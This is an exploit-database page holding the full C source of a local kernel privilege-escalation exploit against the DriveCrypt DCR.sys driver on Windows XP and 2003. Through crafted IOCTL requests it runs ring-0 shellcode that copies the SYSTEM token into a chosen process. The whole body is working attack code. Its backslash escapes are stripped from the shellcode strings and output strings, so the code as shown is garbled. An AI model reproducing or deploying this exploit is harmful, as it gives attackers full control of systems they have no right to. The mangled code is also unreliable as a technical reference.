[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DriveCrypt <= 5.3 Local Kernel ring0 SYSTEM Exploit
# Published : 2011-01-11
# Author : mu-b
# Previous Title : Mono/Moonlight Generic Type Argument Local Privilege Escalation
# Next Title : ALZip 8.12.0.3 Buffer Overflow (SEH)


/* drivecrypt-dcr.c
 *
 * Copyright (c) 2009 by <mu-b@digit-labs.org>
 *
 * DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit
 * by mu-b - Sun 16 Aug 2009
 *
 * - Tested on: DCR.sys
 *
 * Compile: MinGW + -lntdll
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>
#include <ddk/ntapi.h>

#define DCR_IOCTL   0x00073800

static unsigned char win32_fixup[] =
  "x89xe5"
  "x81xc5xb4x0cx00x00";

/* Win2k3 SP1/2 - kernel EPROCESS token switcher
 * by mu-b <mu-b@digit-lab.org>
 */
static unsigned char win2k3_ring0_shell[] =
  /* _ring0 */
  "xb8x24xf1xdfxff"
  "x8bx00"
  "x8bxb0x18x02x00x00"
  "x89xf0"
  /* _sys_eprocess_loop   */
  "x8bx98x94x00x00x00"
  "x81xfbx04x00x00x00"
  "x74x11"
  "x8bx80x9cx00x00x00"
  "x2dx98x00x00x00"
  "x39xf0"
  "x75xe3"
  "xebx21"
  /* _sys_eprocess_found  */
  "x89xc1"
  "x89xf0"

  /* _cmd_eprocess_loop   */
  "x8bx98x94x00x00x00"
  "x81xfbx00x00x00x00"
  "x74x10"
  "x8bx80x9cx00x00x00"
  "x2dx98x00x00x00"
  "x39xf0"
  "x75xe3"
  /* _not_found           */
  "xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "x8bx89xd8x00x00x00"
  "x89x88xd8x00x00x00"
  "x90";

static unsigned char winxp_ring0_shell[] =
  /* _ring0 */
  "xb8x24xf1xdfxff"
  "x8bx00"
  "x8bx70x44"
  "x89xf0"
  /* _sys_eprocess_loop   */
  "x8bx98x84x00x00x00"
  "x81xfbx04x00x00x00"
  "x74x11"
  "x8bx80x8cx00x00x00"
  "x2dx88x00x00x00"
  "x39xf0"
  "x75xe3"
  "xebx21"
  /* _sys_eprocess_found  */
  "x89xc1"
  "x89xf0"

  /* _cmd_eprocess_loop   */
  "x8bx98x84x00x00x00"
  "x81xfbx00x00x00x00"
  "x74x10"
  "x8bx80x8cx00x00x00"
  "x2dx88x00x00x00"
  "x39xf0"
  "x75xe3"
  /* _not_found           */
  "xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "x8bx89xc8x00x00x00"
  "x89x88xc8x00x00x00"
  "x90";

static unsigned char win32_ret[] =
  "xb8x63x39x01x00"
  "xffxe0";

struct ioctl_req {
  int action;
  int flag;
  char *arg1;
  char pad[0x0C];
  char *arg2;
  char _pad[0x0C];
  void *ptr;
};

static PCHAR
fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
{
  DWORD dwVersion, dwMajorVersion, dwMinorVersion;

  dwVersion = GetVersion ();
  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

  if (dwMajorVersion != 5)
    {
      fprintf (stderr, "* GetVersion, unsupported versionn");
      exit (EXIT_FAILURE);
    }

  *(PDWORD) &win32_ret[1] += (DWORD) base;

  switch (dwMinorVersion)
    {
      case 1:
        *zlen = sizeof winxp_ring0_shell - 1;
        *(PDWORD) &winxp_ring0_shell[55] = ppid;
        return (winxp_ring0_shell);

      case 2:
        *zlen = sizeof win2k3_ring0_shell - 1;
        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
        return (win2k3_ring0_shell);

      default:
        fprintf (stderr, "* GetVersion, unsupported versionn");
        exit (EXIT_FAILURE);
    }

  return (NULL);
}

static PVOID
get_module_base (void)
{
  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
  PSYSTEM_MODULE_INFORMATION pModuleInfo;
  DWORD i, num_modules, status, rlen;
  PVOID result;

  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
  if (status != STATUS_INFO_LENGTH_MISMATCH)
    {
      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
      exit (EXIT_FAILURE);
    }

  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);

  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
  if (status != STATUS_SUCCESS)
    {
      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
      exit (EXIT_FAILURE);
    }

  num_modules = pModuleInfo->Count;
  pModuleBase = &pModuleInfo->Module[0];
  result = NULL;

  for (i = 0; i < num_modules; i++, pModuleBase++)
    if (strstr (pModuleBase->ImageName, "DCR.sys"))
      {
        result = pModuleBase->Base;
        break;
      }

  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);

  return (result);
}

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  CHAR buf[1024], buf1[8], buf2[0x88+1];
  DWORD rlen, zlen, ppid;
  LPVOID zpage, zbuf, base;
  HANDLE hFile;
  BOOL result;

  printf ("DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploitn"
          "by: <mu-b@digit-labs.org>n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!nn");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\.\DCR", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %dn", hFile);
      exit (EXIT_FAILURE);
    }

  memset (&req, 0, sizeof req);
  req.action = 0x153;
  req.flag = 0;
  req.ptr = buf;

  printf ("* enabling driver...n");
  result = DeviceIoControl (hFile, DCR_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failedn");
      exit (EXIT_FAILURE);
    }
  printf ("** version: 0x%08X [%s], %sn", *(int *) &buf[8], &buf[12], &buf[19]);
  printf ("* donen");

  zpage = VirtualAlloc ((LPVOID) 0x610000, 0x10000,
                        MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (zpage == NULL)
    {
      fprintf (stderr, "* VirtualAlloc failedn");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]n",
          zpage, 0x10000);

  base = get_module_base ();
  if (base == NULL)
    {
      fprintf (stderr, "* unable to find DCR.sys basen");
      exit (EXIT_FAILURE);
    }
  printf ("* DCR.sys base: 0x%08Xn", base);

  memset (zpage, 0xCC, 0x10000);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy ((LPVOID) zpage + 0x61, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) - 1), zbuf, zlen);
  memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) + zlen - 1),
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.action = 79;
  req.flag = 0;

  memset (buf1, 0x41, sizeof buf1);
  buf1[sizeof buf1 - 1] = 0;
  req.arg1 = buf1;

  memset (buf2, 0x61, sizeof buf2);
  buf2[sizeof buf2 - 1] = 0;
  req.arg2 = buf2;

  req.ptr = buf;

  printf ("* hitting.. ");
  fflush (stdout);

  result = DeviceIoControl (hFile, DCR_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failedn");
      exit (EXIT_FAILURE);
    }

  printf ("donenn"
          "* hmmm, you didn't STOP the box?!?!n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}